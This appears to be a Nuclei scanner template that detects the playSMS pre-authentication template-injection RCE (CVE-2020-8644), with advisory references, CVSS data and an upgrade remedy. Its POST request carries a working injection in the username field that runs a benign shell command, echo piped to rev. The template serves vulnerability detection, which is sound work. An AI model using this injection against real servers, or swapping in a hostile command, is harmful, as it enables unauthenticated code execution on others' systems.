id: CVE-2020-8644 info: name: playSMS <1.4.3 - Remote Code Execution author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. remediation: | Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8644 cwe-id: CWE-94 epss-score: 0.96035 epss-percentile: 0.99327 cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: playsms product: playsms tags: unauth,kev,packetstorm,cve,cve2020,ssti,playsms,rce http: - raw: - | GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - | POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= cookie-reuse: true host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - '4468-0202-EVC' - type: status status: - 200 extractors: - type: xpath name: csrf internal: true xpath: - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input attribute: value part: body # digest: 490a004630440220199f79aa6f7f857ccc3f48619e9009a9fd91a25db3c85a73a24b272c2ce9a9ca02206c0d4445008f1bd0927d403be87499414857285ca9615f96d4262dddac7d6d2a:922c64590222798bb761d5b6d8e72950